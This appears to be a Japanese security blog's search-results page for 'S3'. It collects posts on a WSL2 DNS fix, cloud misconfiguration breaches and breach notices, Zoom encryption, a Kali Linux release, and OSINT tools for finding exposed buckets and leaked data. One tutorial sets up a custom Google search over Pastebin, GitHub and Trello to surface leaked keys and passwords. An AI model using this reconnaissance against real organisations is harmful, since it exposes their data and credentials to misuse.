検索キーワード「S3」に一致する投稿を関連性の高い順に表示しています。 日付順 すべての投稿を表示
検索キーワード「S3」に一致する投稿を関連性の高い順に表示しています。 日付順 すべての投稿を表示

WSL2のKali Linuxで名前解決ができない場合の対応


WSL2でKali Linuxを使っていたら、インターネットに接続できない事象に出くわした。いろいろ調べてみると、ネットワークのドメインを解決できていない模様。

今回はそんな課題にぶち当たった際の原因を特定し、解決するための方法を紹介します。

問題の症状

wsl上のLinuxでpingやapt updateできなくなる。

pingができない

例えばgoogleへのpingが返ってこない。

> ping google.com
ping: google.com: Temporary failure in name resolution

apt updateができない

apt updateするとTemporary failureが起きる。

 sudo apt update
無視:1 http://http.kali.org/kali kali-rolling InRelease
無視:2 https://brave-browser-apt-release.s3.brave.com stable InRelease
無視:2 https://brave-browser-apt-release.s3.brave.com stable InRelease
無視:1 http://http.kali.org/kali kali-rolling InRelease
無視:1 http://http.kali.org/kali kali-rolling InRelease
無視:2 https://brave-browser-apt-release.s3.brave.com stable InRelease
エラー:1 http://http.kali.org/kali kali-rolling InRelease
  'http.kali.org' が一時的に解決できません
エラー:2 https://brave-browser-apt-release.s3.brave.com stable InRelease
  'brave-browser-apt-release.s3.brave.com' が一時的に解決できません
パッケージリストを読み込んでいます... 完了
依存関係ツリーを作成しています... 完了
状態情報を読み取っています... 完了
アップグレードできるパッケージが 14 個あります。表示するには 'apt list --upgradable' を実行してください。
W: http://http.kali.org/kali/dists/kali-rolling/InRelease の取得に失敗しました  'http.kali.org' が一時的に解決できません
W: https://brave-browser-apt-release.s3.brave.com/dists/stable/InRelease の取得に失敗しました  'brave-browser-apt-release.s3.brave.com' が一時的に解決できません
W: いくつかのインデックスファイルのダウンロードに失敗しました。これらは無視されるか、古いものが代わりに使われます。

対処

wsl2ではDNSサーバの設定であるresolv.confが自動的に生成される。なのでこの設定を変更する。

  1. powershellかwslマンドでログインする。
  2. 制御をするためのファイル(/etc/wsl.conf)を作る。

    sudo vi /etc/wsl.conf
  3. 中身を次のようにする。

    [network]
    generateResolvConf = false
  4. 別のpowershellを立ち上げてwslをシャットダウンさせる。

    wsl --shutdown
  5. WSL2を起動して/etc/resolv.confを書き換える。

    > wsl
    > sudo vi /etc/resolv.conf
    
  6. 中身を書き換える。

    nameserver 8.8.8.8

これでDNSサーバの設定ができドメイン名が解決できるようになる。

出典:WSL2でネットワークのドメインを解決できない場合の対処

いくらクラウドがセキュリティに強いからって、利用者側の管理が駄目なら情報漏洩します。



IPAから「ウェブサイト開設等における運営形態の選定方法に関する手引き」がリリースされています。

クラウド活用が順調に広まってきていますが、IaaS、PaaS、SaaS等いろいろな種類のクラウドサービスがあり、各サービスで提供者と利用者の役割分担や責任分界点が変わってきます。

この資料ではオンプレも含めたクラウドサービスは下記の通り。
ちなみに一番上が最も利用者の役割分担と責任分担と自由度が小さい形態。
逆に下に行くほど利用者の役割分担と責任分担と自由度が大きい形態。

・モール(楽天市場とかAmazonとか)
・ASP、SaaS(Salesforce、Gsuite、Office365とか)
・PaaS、レンタルサーバ(AwS、Azure、Zenlogicとか)
・IaaS
・ハウジング
・オンプレミス

んで、なかなかよくまとめられていると感じたのが下記の図


クラウド移行後も利用者の責任となる部分がきれいに整理されています。
個人的には業務セキュリティ対策の中にアカウント管理も入れておいてほしかったかな。

クラウドが日本よりも進んでいる海外ではクラウド環境ゆえのインシデントが起きています。

まずSaaS。Office365やGsuiteに移行したのはいいが、利用者側の特権アカウントの管理がずさんで、乗っ取られてしまい、全ユーザーのメール情報が漏洩してしまう事件が起きています。特権アカウントの管理は結構ずさんになりがちですが、定期的なパスワード変更や二要素認証などを導入して管理強化を図る必要があります。

次にPaaS。これまでオンプレであった場合、インターネットとの間にF/Wを設置するので、サーバ担当がオペミスしてもF/Wで何とかなっていましたが、PaaSになるとF/Wもサーバもマウス操作で簡単に変更できてしまいます。そのため、例えばAwSのS3で設定ミスって内部情報をインターネットに向けて公開してましたって事件が起きています。
直近ではホンダのインド法人Honda Cars Indiaで、AwSのS3の設定ミスって5万人分の個人情報をインターネットに向けて公開しちゃってた事件があります。

クラウドが普及して一見ITの知識は不要になるように見えても、ITの知識とリテラシーを備えた人材はユーザー企業でも確保しておく必要があります。

【関連資料】
ウェブサイト開設等における運営形態の選定方法に関する手引き(IPA)
ホンダの海外法人が5万人分を超える顧客情報をクラウド上で公開していた
Honda leaked personal information from its Honda Connect App
Honda India Left Details of 50,000 Customers Exposed on an AWS S3 Server

クラウドOSINT / Cloud OSINT + free cloud training courses & certifications(転載)

Cloud OSINT + free cloud training courses & certifications

コンピュータ技術は、小型化、シンクライアント化、プッシュプルモデルによる更新情報を提供する中央管理型のインフラへと移行し続けていますが、ひとつ確かなことは、クラウドが未来であるということです。

クラウド環境でのインシデントレスポンス、OSINTに基づく調査、クラウドベースのデジタルフォレンジックなど、この継続的な適応には、デジタル調査も適応しなければなりません。

脅威を調査したり対応したりするためには、まず環境を理解する必要があります。

サービスプロバイダーが誰であるかに関わらず、クラウドは世界中に散在する物理的および仮想的なコンピューティングリソースの組み合わせであり、デジタル「テナント」によって短期または長期的にレンタルされています。

クラウドについて学ぶことは、デジタル調査員にとって有益です。実際、クラウド・コンピューティングに関して、これほど多くの無料教育コンテンツが提供されていることはありません。

 Cloud OSINT

一般的なクラウドOSINT調査では、一般に公開されている(多くの場合、意図せずに公開されている)オンラインコンテンツに焦点が当てられ、一般にバケット(AWS、Google Cloud)やブロブ(Azure)と呼ばれるクラウドストレージリソースに展開されます。

公開されているバケットやブロブには、ビデオやMP3ファイルの再生、画像やPDFの表示など、Webサイトと同じようにオブジェクトを格納して表示することができます。

「漏れたバケツ」を検索することは、単なる調査の切り口ではなく、サイバーセキュリティの専門家や監査人がデータポリシーのギャップを見つけ、コンプライアンス違反を排除するためにも行われます。

ここでは、クラウド上で公開されているコンテンツを検索するための便利なツールをご紹介します。

  • Grey Hat Warfare - ファイル、バケット、ブロブの検索可能なデータベースです。様々なクラウドリソースをキーワードで検索できます。完全な検索結果、リスト、ファイル拡張子、その他のオプションは、有料のサブスクリプションのみで利用可能です。

  • Osint.sh Public Buckets - Amazon S3バケットとAzure blobの両方を検索します。キーワードやファイルの拡張子で検索を絞り込むことができます。

  • Digi Ninja’s Bucket Finder - オフラインツール、ダウンロードが必要です。バケット名をチェックして、その公開/非公開の設定やパーミッションをチェックします。

ウェブやオフラインのツールは便利で簡単に利用できますが、本当の意味でのチャンスや選択肢の豊富さは、Githubや、公開すべきでないクラウドリソースを列挙して特定するために作成された数多くのリポジトリにあります。

上記の資料の範囲は非常に広く、それらの資料を利用するには、ある程度深い理解と勉強が必要になるでしょう。

幸いなことに、そのような目的のための資料には事欠きません。

セキュリティリサーチャー向けの検索エンジン30選 (その1)

 

1. DeHashed


オンラインで利用可能なセキュリティおよび不正防止ツールの中でも、DeHashedは最も人気があり、先進的なツールの1つです。DeHashedプラットフォームを通じて、ユーザーは、ハッキングされたデータベースから情報を検索し、取得することができます。様々なハッカーデータベースを利用することで、DeHashedプラットフォームは、ユーザーがハッカーによって公開または漏洩された情報を検索することを可能にします。

このプラットフォームにより、ユーザーは漏えいした情報を迅速に取り出すことができ、情報がハッカーやウェブ上の他の有害な要素に悪用されるのを防ぐことができます。これは、最も速く、最も重要なデータ漏洩検索エンジンの1つです。その分かりやすいインターフェースと使いやすさから、流出した情報を素早く簡単に見つけたいユーザーに人気があります。

2. Security Trails


SecurityTrailsを使えば、企業は、ドメイン名、登録データ、DNS情報など、現在および過去の膨大なインターネット記録を収集・管理することで、脅威の攻撃対象領域(広いインターネットからアクセス可能なネットワークやサーバー)がどのようになっているかを確認することができます。

3. DorkSearch


DorkSearchを使えば、様々なタイプのGoogle Dorksに対応した既成のテンプレートを見つけることができます。

4. ExploitDB


エクスプロイトデータベースは、脆弱性研究者と侵入テスト担当者のために開発された、 一般に公開されているソフトウェアのエクスプロイトと脆弱性のアーカイブです。直接の投稿、メーリングリスト、その他の公的なソースを通じて、エクスプロイト、シェルコード、論文の最も包括的なコレクションを集め、簡単にナビゲートできる、自由にアクセスできるフォーマットで提供しています。

5. ZoomEye


中国のKnownsec社が開発した検索エンジン「Zoomeye」は、地図を利用してオープンデバイスやウェブサービスからデータを収集し、指紋を分析する。最初のバージョンは2013年にリリースされた。現在のバージョンはVersion 3です。

6. Pulsedive


pulsedive.comでは、ユーザーからの投稿や脅威情報のフィードを利用して生成された、3500万件以上の検索可能なIOCを無料で見つけることができます。Pulsediveは、アナリストを中心とした脅威インテリジェンス・プラットフォームです。Pulsediveの無料の脅威インテリジェンスデータセットを使って、あらゆるWebサイトのIP、ドメイン、URLをハイライトし、リッチ化することができます。

7. GrayHatWarefare


ソフトウェアエンジニアのGrayhatWarfareが作成した検索可能なデータベースである無料ツールには、現在48,623個のオープンS3バケットが登録されています。コンテンツをキャッシュする一般的な方法として、アマゾンのS3クラウドストレージ(Simple Storage Service)は、公共・民間ともに利用されています。ファイルにはバケットが割り当てられ、デフォルトでは安全かつ非公開になっているが、ユーザーが簡単に公開に設定することができる。

8. PolySwarm


PolySwarmは、新しい技術や革新的な脅威検知手法の発信基地として、お客様の安全をリアルタイムに守るために日々奮闘しています。PolySwarmは、脅威検知エンジンのネットワークによって支えられています。商用エンジンと専門的なソリューションを組み合わせることで、広い範囲をカバーします。

9. Fofa


FOFAを使えば、ユーザーはIP資産を簡単に見つけることができ、ネットワーク資産を迅速に照合し、フォローアップのプロセスをスピードアップすることができます。BAIMAOHUIが開発したサイバースペースサーチエンジンです。脆弱性範囲分析、アプリケーション配布統計、人気ランキング統計など、多くの事例があります。

10. LeakIX


LeakIXとShodanの間には、視覚的にも、使用するクエリに基づいても、いくつかの機能がありますが、Webベースのプラットフォームは、Shodanと非常に似た視覚的な体験を提供します。このプラットフォームの価値は、インターネット上で侵害されたデバイス、サーバー、データベーススキーマに対する洞察を提供する能力にあると思います。

出典:30 Search Engines for Cybersecurity Researchers (Part 1 of 3)

カスタム検索エンジンで企業データを検索する


組織に関する機密情報を探し出すことは、OSINTの実務家にとって重要なスキルです。フィッシングの偵察であれ、文書を探す調査報道であれ、雑音を排除し、企業や組織に関連する有用な情報を見つける能力は不可欠です。

Google dorksの使用は、検索をフィルタリングするのに便利なテクニックです。例えば、英国政府のPDFファイルを探すドークは、次のようなものです。

site:gov.uk filetype:pdf

dorksは強力ですが、同じサイトに同じdorksを何度も入力することになります。

もし定期的に反復的な OSINT タスクを実行しているなら、できる限り自動化してプロセスをより効率化する方法を検討する価値がある。この記事の残りの部分では、Googleの力を利用して、興味深いデータをより簡単に見つけるための独自のプログラム可能な検索エンジンを作成する方法を見ていく。このチュートリアルのような検索エンジンを使えば、PDFやOffice文書などのファイル、電子メール、電話番号、あるいは機密性の高いビジネス情報まで見つけることができる。

Programmable Search Engines

Googleは、ユーザーが特定のニーズに合わせて高度にカスタマイズされた検索ツールを作成することができるプログラマブル検索エンジンの作成を許可しています。検索エンジンを作成するには、Googleアカウントにログインして、https://programmablesearchengine.google.com にアクセスします。ログイン後、「新しい検索エンジンを作成する」をクリックします。このようなメニューが表示されます。


検索エンジンに名前をつけます。

次に、検索したい場所を正確にGoogleに伝える必要があります。これは、ツールを設定する上で最も重要な部分なので、正しく設定するために少し時間を費やす価値があります。

冒頭のGoogle dorkの例では、site: フィルタを使って、ある特定のドメイン内のみを検索するようにGoogleに指示しました。これは便利だが、毎回同じ10~20のサイト内を検索したい場合はどうすればいいのだろうか?そのために検索クエリを書き出すとなると、時間がかかってしまいます。代わりに、プログラム可能な検索エンジンを使えば、Googleに一度だけ伝えるだけで、毎回同じ検索エンジンのクエリを再利用することができます。

Adding Sites To Search


サイトを追加するには、「特定のサイトまたはページを検索する」オプションを選択します。流出した情報を探すことになるので、Pastebinのコンテンツもすべての検索対象に含めたい。

pastebin.comドメイン全体を検索するには、*.pastebin.com/*を入力し、Addをクリックしてください。ドメインの前後にワイルドカードの*を追加することで、Googleはドメイン全体からのデータを含むことを保証します(Googleがサイトのその部分をインデックスしている場合)。

検索エンジンに追加するドメインは、まさにあなたが見つけたいデータの種類によって異なります。以下は、検討すべきいくつかの例です。

slideshare.net - 企業が第三者と共有するために、ここにプレゼンテーションを掲載することがよくあります。売上予測、技術スタック、電子メールアドレス、会社の人事に関する情報はここで見つけることができます。



Github.com - 開発者は機密コード、秘密鍵、電子メールアドレス、その他の有用なスニペットをここに残します。

StackOverflow.com - 世界最大のコードトラブルシューティングのためのサイトです。開発者が他の人に助けを求める際に、修正されていない会社のデータをここに投稿することがあることを意味します。

Scribd.com - ユーザーがあらゆる種類のPDFやドキュメントをアップロードして共有することができます。

Trello.com - Trelloは共同作業とプロジェクト管理のためのプラットフォームです。社員名、会社のプロジェクト情報、連絡先、カレンダー、そして(時には)パスワードや機密文書も検索できます。

s3.amazonaws.com - この検索語は、さまざまな文書やファイルを含むオープンなAmazon S3バケットを見つけることができます。

Chegg.com - これは、ユーザーが学習しようとしている事実をアップロードして共有するフラッシュカード学習サイトです。Bellingcatが、米軍関係者がテストの準備のために核兵器に関する機密情報をアップロードしていたことを発見した経緯は、こちらで読むことができます。

これらはほんの一例です。追加できるドメインの数に制限はなく、ニーズの変化に応じていつでもドメインの追加や削除が可能です。

準備ができたら キャプチャを完了し、"作成 "をクリックします。

Using Your Search Engine

検索エンジンが作成されると、独自のURLが作成され、https://cse.google.com/cse?cx=xxxxxxxxxxxxx のように表示されます。このURLに直接アクセスすることで、検索エンジンにアクセスすることができます。Googleはまた、自分のウェブページに検索エンジンを埋め込むオプションも提供しています。

簡単な例を挙げましょう。自動車メーカーのフォルクスワーゲンについて情報を集めたいとします。通常のGoogleの検索エンジンを使う代わりに、特注の検索エンジンを使えばいいのです。なぜなら、これらの特定のサイトが、欲しいデータを見つける可能性が最も高い場所だと知っているからです。

「volkswagen.com」をストレートに検索すると、1ページ目にソフトウェアプロジェクトやマーケティングスライドなどの資料が表示されます。


その他にも、興味を引くような情報がたくさんあります。ここではそのいくつかをご紹介します。




プログラマブルサーチエンジンを使えば、同じサイトに何度も同じドークをかける必要はありません。検索対象を一握りのドメインに限定することで、より迅速かつ容易に有用な結果を得ることができるのです。さらに限られた数のドメインからしか検索しないにもかかわらず、filetype:、intext:、-(否定)などの通常のGoogleフィルターを使用して、結果を細かく調整することが可能です。

カスタム検索エンジンは非常に効果的なツールであり、定期的に調整し改良することで、非常に有用な追加ツールとなります。


zoom、暗号化を強化へ(AES256GCMとは)


武漢ウイルスの蔓延で、リモート会議ツールの代名詞となりつつあるzoom。

対面形式のセミナーが軒並み中止となり、ZOOMを使ったセミナーに変更になり、zoom飲み会なんて言う言葉も生まれた。

自宅は3日間の総通信料が10GBを超過すると速度制限がかかってしまうのだが、zoomはそんな速度制限下でもさほど遅延なく、デスクトップ共有されても非常にきれいに見えるので、一体どんな技術使っているのだろうかと大変興味深い。

一方でビデオ会議システムとしてのデファクトスタンダードになるということは、不正アクセスに晒されるリスクも高くなる(攻撃者視点で考えた場合、zoomを攻略したほうが費用対効果が高くなるので、様々なアタックを受け、脆弱性が見つかりやすくなる)

一方、zoomの問題として、録画データがAWS S3バケットに暗号化されずに乗っていて、特定の命名規則で公開されているという話や、アメリカはzoomを中国企業とみなしている等、きな臭い噂が流れている。

そんなzoomが暗号強化の発表をした。

従来はAES256ECBだったものを、AES256GCMに変えるらしい。

暗号強度については過去に一度学習したことがあったが、大分記憶があいまいになっているため、これを機に整理しておきたいと思う。

AESとは

AES(Advanced Encryption Standard)と暗号化アルゴリズムの名称

暗号化アルゴリズムには共通鍵暗号方式と公開鍵暗号方式があり、AESは共通鍵暗号方式に分類される。

その後ろの数字(256)は鍵長を指す。

AESは128、192、256の3パターンが利用できる。

つまりAES256とは、AESの中で最も長い(強度の強い)鍵長となる。

最後のECBやGCMは利用モードを指す

ECBとは

ECBモード (Electronic Codebook Mode)とは、もっとも単純な暗号利用モードである。

メッセージはブロックに分割され、それぞれのブロックは独立して暗号化される。

ECBモードの欠点は、同じ鍵を用いた場合ある平文ブロックを暗号化した結果の暗号文ブロックが常に同じとなることである。

このため、データのパターンを隠蔽することができない。

メッセージの機密性の保持には向かず、暗号化プロトコルにおける使用は推奨されない。

GCMとは

GCM(Galois/Counter Mode)とは、認証付き暗号の一つであり、データ保護と認証(完全性確認)の両方の機能を提供する。

暗号機能(=前出のECBに相当)部分はCTRモード (Counter Mode)が利用されている。

ECBモードが原始的なブロック暗号モードであるのに対して、CTRモードはブロック暗号でもありながら、ストリーム暗号にも属するため、ストリーミングの暗号化に適しているとされる。

認証付き暗号と言うのは、データの秘匿性、完全性、および認証性を同時に提供するためのものであり、暗号データそのものの改善を防ぐために暗号化データに検算用データ(=認証)を付加し、複合化時に改ざんされていないことをチェックするようなものである。

認証についてはGalois modeという、ガロア域 (Galois field)における乗法を用いた計算式を用いている。

暗号化の話は深入りすると数学の世界に入り込んでしまうため、ここまでにしておきたい。

ECBモードがいつからあったか分からなかったのだが、後継であるCBCモードが1976年に開発されているので、ECBモードも同年にあったとしよう。

一方のGCMは2007年にNISTが標準として制定した。

つまり、暗号化方式については石器時代から近代まで一気にバージョンアップされたということだろう。うん。

【参考】
https://www.itmedia.co.jp/news/articles/2004/23/news065.html

zoomの脆弱性ときな臭い噂


武漢ウイルス(通称コロ助)の蔓延により、セミナーが軒並み中止や延期になっている。

その一方で、代替手段としてzoomの名前をよく聞くようになった。

自分は2018年に仮想通貨関連のオンラインセミナーで初めて使った。

基本的にはskypeのようなものと思っていただければよいが、セミナーに参加するだけのようなケースであれば、zoomはインストールだけでも大丈夫である。

また、1対多が可能で、多が数百人クラスになっても耐えられるプラットフォームであり、品質は安定しつつ、トラフィックはskypeほど食わないとも言われている

ちなみに自分の会社でも検討されたようだが、価格が高すぎて見送りになったらしい。

プライベートではと言うと、中止になったセミナーがzoom上で開催されるというケースが増えている。

セミナー参加者の立場で使ってみたが、設定は楽だし、画質も音声も結構安定していた。

イギリスでは閣僚のビデオ会議としても使用されているらしい。

ミーティングID付きのスクリーンショットをうっかり公開してしまい、アクセスが殺到したそうな。

これは素晴らしいツールだと思っていたのだが、だいたい利用者が増えてくる=攻撃者の標的になる=脆弱性が見つかるという構図となり、zoomも例にもれず脆弱性が見つかった。

しかも脆弱性以外でも厄介な問題が持ち上がっている。

まずはベタなクライアントの脆弱性。
ま、こちらはパッチを当てれば済むという問題である。

https://www.ipa.go.jp/security/ciadr/vul/alert20200403.html

んで、頭の痛いのがこっち。

どうもZoomの録画が、AWS S3バケットに暗号化されずに乗っていて、特定の命名規則で公開されてるらしい。

https://www.washingtonpost.com/technology/2020/04/03/thousands-zoom-video-calls-left-exposed-open-web/

IaaS使うのはいいけど、設定誤ってデータが露出してましたーって、2月もあったな。。。

https://blog.b-son.net/2019/08/blog-post_31.html

また、zoom社は本部はアメリカにある米国企業ですが、2015年から米国SECが求める情報公開をしていないとか、Zoomの拠点は北京と認識されている等、米中貿易摩擦の観点か、安全保障の観点かちょっとわかりませんが、きな臭い雰囲気も漂っています。

【セキュリティ事件簿#2024-048】トヨタモビリティサービス株式会社 お客様のメールアドレス等の漏洩可能性に関するお詫びとお知らせについて

トヨタモビリティサービス株式会社

トヨタモビリティサービス株式会社が提供する社用車専用クラウドサービス「Booking Car」をご利用中、または過去ご利用いただいた企業・自治体の従業員・職員の方のメールアドレスおよびお客様識別番号(管理用の目的でお客様お一人お一人に割り振らせていただいている番号)、約25,000名分が漏洩した可能性があることが判明致しました。
「Booking Car」をご利用いただいている企業・自治体およびご登録いただいているお客様には大変なご迷惑、ご心配をおかけすることを、心よりお詫び申し上げます。

対象となるお客様は、2020年11月以降、「Booking Car」のご利用画面にてご自身のメールアドレスをご登録いただいた方となります。また、漏洩の可能性のある個人情報は以下のとおりでございます。なお、クレジットカードに関する情報は当システム内に保持しておりませんので、漏洩の可能性はございません。

1 写真アップロード操作で保存した写真データ(顔写真、車両キズ等)
2 車両登録でお客様が設定した車両の画像データ
3 車両・従業員登録に使用する一時ファイルやログ情報

調査の結果、お客様のメールアドレスおよびお客様識別番号が保管されているデータサーバーへの不正アクセスおよび保管データの削除が行われたことが判明いたしました。お客様の個人情報流出の事実は確認できておりませんが、完全には否定できない状況となっております。

メールアドレスおよびお客様識別番号が漏洩した可能性のあるお客様には、ご登録いただいているメールアドレス宛に、本日より、メールを送付させていただき、お詫びと共に内容のご報告をさせていただきます。加えて、お客様からのご質問やご不安などにお答えするための専用のコールセンターを設置致しました。

1. 経緯と対応

2024年2月2日、「Booking Car」のデータ保管サーバー(Amazon Web Services S3 以下「AWS」といいます。)に対して、システム開発以前から使用されていたアクセスキーを用いて、不正に侵入がなされている事実を確認いたしました。調査の結果、2020年10月~2024年2月2日までの間、システム開発以前から使用されていたアクセスキーを利用することで、データサーバーに保管されているメールアドレスおよびお客様識別番号にアクセスできることが判明致しました。同日、直ちにデータサーバーのアクセスキーの変更および継続的な不正アクセスのモニタリング等の対応を実施しており、現時点で二次被害等は確認されておりません。

なお、「Booking Car」のデータ保管サーバーは、「Booking Car」の運用および当社の提供する他のサービスとは別個独立したサーバーであり、「Booking Car」の運用および当社の提供する他のサービスに影響はございません。

2. 流出の可能性が発生した原因

2020年2月、「Booking Car」開発委託先企業が、過去のプロダクト開発に使用していたAWS保存領域を使用し、「Booking Car」の一部の開発を開始しましたが、その際、過去の別プロダクト用に設定したAWSアクセスキーを無効化または消去するべきところ、2024年2月2日まで、適切に処理されておりませんでした。

本件は、開発委託先企業におけるアクセスキーの不適切な取り扱いが原因であり、委託元企業として、改めて委託先企業とともに、お客様の個人情報取り扱いに関する管理の徹底、およびセキュリティ機能の強化に向けた取組みを進めてまいります。

弊社として、お客様の個人情報を適正に取り扱うことは、企業の重要な社会的責務であることを改めて認識し、お客様の個人情報保護・管理の徹底について、お客様から信頼を寄せていただけるサービスの実現に向け、より一層尽力してまいります。

お客様へのお願い

現時点で本件に関わる個人情報の不正利用は確認されておりませんが、差出人や件名に心当たりのない不審なメールを受信された場合は、ウイルス感染や不正アクセス等の危険がありますので、メール内に記載されたアドレス(URL)へのアクセスや添付ファイルの開封を行わず、メール自体を直ちに消去いただくようお願いいたします。

クラウドストレージの誤設定による情報漏洩事案(2020年2月)


日本でもクラウド化が進んでいるが、日本よりもクラウドが進んだ欧米ではクラウドからの情報流出事案が後を絶たない。

※ここでいうクラウドとはIaaSを指します。

予め言っておくが、クラウド自体は問題ではない。

正しく設定して運用管理を行えば、クラウドは安全である。

しかし、設定を誤ると、情報は安易に漏れる。

これがクラウドのリスクである。

企業が自社でイントラネットを構築し、その中でサーバの運用を行っている状態であれば、仮にサーバの設定がザルだったとしても、ネットワークレイヤのセグメント分離により助かるケースはあり得る。

しかし、クラウドの場合、すぐ隣はインターネットの世界となり、サーバの運用管理がザルだと致命傷に直結する。

自分はクラウドについては肯定的だが、インフラについてはクラウド化してもオンプレ同様の人的リソースが必要と考えている。

それを怠った結末を2つ紹介したい。

■受刑者情報3万6千件が露出(アメリカ)
AWSのストレージサービスAmazon S3の「バケット(Bucket)」が、セキュリティ保護および暗号化されていなかったために、米国の刑務所に収容されている受刑者についての記録36,077件が露出

https://www.vpnmentor.com/blog/report-jailcore-leak/

■電車通勤者の情報1万人分が漏えい(イギリス)
AWSクラウドストレージ上のデータベースがパスワード保護されていなかったため、英国の「Network Rail」社が管理する駅で無料Wi-Fiサービスを利用する乗客についての情報が漏えい

https://securitydiscovery.com/c3uk/


数年後には日本からも同様のインシデント発生が予測されるので、自社のIaaS導入は心してかかりたい。


【参考】
クラウドストレージの誤設定による情報漏えいが続発
https://blog.trendmicro.co.jp/archives/24234

【セキュリティ事件簿#2024-098】株式会社Philo お客様の情報の漏洩可能性に関するお詫びとお知らせ 2024/3/7


弊社(株式会社Philo(旧社名:株式会社RIDENOW))は、カーシェアサービス「RIDENOW」(以下「弊社サービス」といいます。)を運営しておりましたが、この度、弊社システムへの不正アクセスにより、弊社サービスをご利用いただいていたお客様に関するデータが削除され、また、漏洩した可能性があることが判明いたしました。お客様には大変なご心配、ご迷惑をおかけすることとなり、心よりお詫び申し上げます。

漏洩の可能性があるのは、以下の各データの情報(合計約1700名分)でございます。なお、クレジットカードに関する情報は弊社システム内には保持しておりませんので、今回の不正アクセスによる漏洩の可能性はございません。

お客様の運転免許証及び車検証の画像
お客様の車両画像・車両キズ等の画像
お客様のプロフィール画像
お客様がトークルームにアップロードされた画像
お客様の操作等に関するログ情報

調査の結果、現時点で確認されているのは、お客様の個人情報が弊社システムから削除されたことのみであり、これが外部に漏洩した事実は確認されておりませんが、その可能性も完全には否定できない状況となっております。

データが漏洩した可能性のあるお客様には、順次、ご登録いただいているメールアドレスまたはご住所宛に、メールまたは文書を送付させていただき、お詫びと共に内容のご報告をさせていただいております。

また、弊社では、本件について、お客様からのご質問やご不安などにお答えするためのお問合せ窓口を設置いたしました。現状弊社にて把握している詳細とあわせてお知らせをさせていただきます。

<経緯と対応>

2024年2月2日、弊社サービスのデータ保管サーバー(Amazon Web Services S3。以下「AWS」といいます。)に対して、不正に侵入がなされている事実を確認いたしました。調査の結果、弊社サービスのリリース時から2024年2月2日までの間、単体利用可能なアクセスキーを利用することで、上記サーバーに保管されている情報にアクセスできる状態であったことが判明いたしました。

同日、直ちに上記サーバーのアクセスキーの変更を行った上、継続的に不正アクセスのモニタリング等の対応を実施しており、現時点で二次被害等は確認されておりません。

<漏洩可能性が発生した原因>

弊社は、2019年7月に弊社サービスのシステム開発を別会社から引き継ぎ、その後、弊社内で開発を行い弊社サービスをリリースしましたが、その際、当該別会社が発行した単体利用可能なアクセスキーを無効化または消去すべきところ、2024年2月2日まで、適切に処理されておりませんでした。

弊社として、お客様の個人情報を適正に取り扱うことは、企業の重要な社会的責務であることを改めて認識し、今後、お客様の個人情報の管理の徹底、セキュリティ機能の強化に向け、より一層尽力してまいります。

<お客様へのお願い>

現時点で本件に関わる個人情報の漏洩や不正利用等は確認されておりませんが、万が一お心当たりのない連絡等があった場合には、念のためご注意をお願いいたします。

なお、運転免許証の画像データが漏洩した可能性も否定はできない状況ではございますが、弊社としては、運転免許証の画像データだけで、本人確認手続を行い、例えば銀行口座を開設するといった悪用をすることは難しいものと考えております。

この度は、お客様に大変なご心配、ご迷惑をおかけしましたこと、重ねて深くお詫び申し上げます。

Kali Linux 2021.4リリース。9つの新ツールを追加 / Kali Linux 2021.4 released with Samba compatibility, Apple M1 support, 9 new tools


Kali Linux 2021.4 released with Samba compatibility, Apple M1 support, 9 new tools:

Offensive Securityは、ついにKali Linux 2021.4をリリースしました。このリリースは、新機能やツールが多数組み込まれていることで話題を集めています。ここでは、新リリースに含まれているものを見てみましょう。

大きな改善点

Kali Linux 2021.4には、Sambaとの互換性、Apple M1サポートの向上、パッケージマネージャミラーの切り替え、GNOME、KDE、Kaboxerのテーマ設定、Raspberry Pi Zero 2 W + USBArmory MkII ARMイメージ、Xfceのアップデートなど、いくつかの改良点が含まれています。

参考:https://www.hackread.com/attacksurfacemapper-new-automated-penetration-testing-tool/

Sambaクライアントは、広い互換性を可能にするように設定されている。そのため、使用しているプロトコルのバージョンに関係なく、ほとんどすべてのSambaサーバーに接続できるようになった。この変更により、Kaliを設定しなくても、Sambaサーバーの発見が容易になります。

Kali Linuxの新バージョンでは、Windowsのアイコンテーマとテーマのサポートが拡張され、プログラムがデスクトップの他の部分とよりよく統合されるようになり、あの醜いフォールバックテーマは必要なくなりました。


新しいツール

Offensive Securityでは、9種類もの新しいツールが追加されており、その詳細は以下の通りです。

  • Dufflebag -公開されたEBSボリュームの検索が可能
  • Maryam -オープンソースのインテリジェンス(OSINT)フレームワーク
  • Name-That-Hash - ハッシュの名前とタイプを発見します。
  • Proxmark3 - Proxmark3とRFIDのハッキングを可能にする
  • Reverse Proxy Grapher - グラフビズのグラフでプロキシの流れを逆手に取る
  • S3Scanner - オープンなS3バケットを検索する
  • Spraykatz - リモートでのprocdumpやlsassプロセスのパースを自動化するための資格情報保存ツール
  • truffleHog - コミット履歴を含む高エントロピー文字列と秘密の git リポジトリを探索する
  • Web of trust grapher (wotmate) - 廃止された PGP pathfinder をキーリングだけで再実装。

ソーシャル・エンジニア・ツールキット

NetHunterアプリの一部であるSocial-Engineer Toolkitが、Kali NetHunterアプリと互換性を持つようになりました。これにより、ユーザーはFacebook、Messenger、またはTwitterのダイレクトメッセージのメール通知を、ソーシャルエンジニアリング攻撃用にカスタマイズすることができます。

Kali Linux 2021.4のインストール方法

既存のKali Linuxのインストールをアップグレードしたり、ライブディストリビューションや新規インストール用のISOイメージをダウンロードすることができます。Windows Subsystem for Linuxにインストールした場合など、以前のバージョンからアップグレードする場合は、このコマンドを使って最新バージョンに切り替えることができます。

echo "deb http://http.kali.org/kali kali-rolling main non-free contrib" | sudo tee /etc/apt/sources.list

sudo apt update && sudo apt -y full-upgrade

cp -i /etc/skel/.bashrc ~/

cp -i /etc/skel/.zshrc ~/

chsh -s /bin/zsh

[ -f /var/run/reboot-required ] && sudo reboot -f


詳細およびダウンロードは、Kali Linuxの公式サイトでご覧いただけます。

Ubiquiti社、「壊滅的な」データ侵害を軽視したとの報道で株価下落 / Ubiquiti Shares Fall After Reportedly Downplaying 'Catastrophic' Data Breach(転載)~正確性を欠いたインシデント公表を行った際の株価への影響は20%程度か!?~


Ubiquiti Shares Fall After Reportedly Downplaying 'Catastrophic' Data Breach:

ニューヨークを拠点とするIoTデバイスメーカーのUbiquitiは、軽視されていたデータ侵害を公表しました。大惨事となったデータ侵害のニュースを受けて、同社の株価は大幅に下落しました。

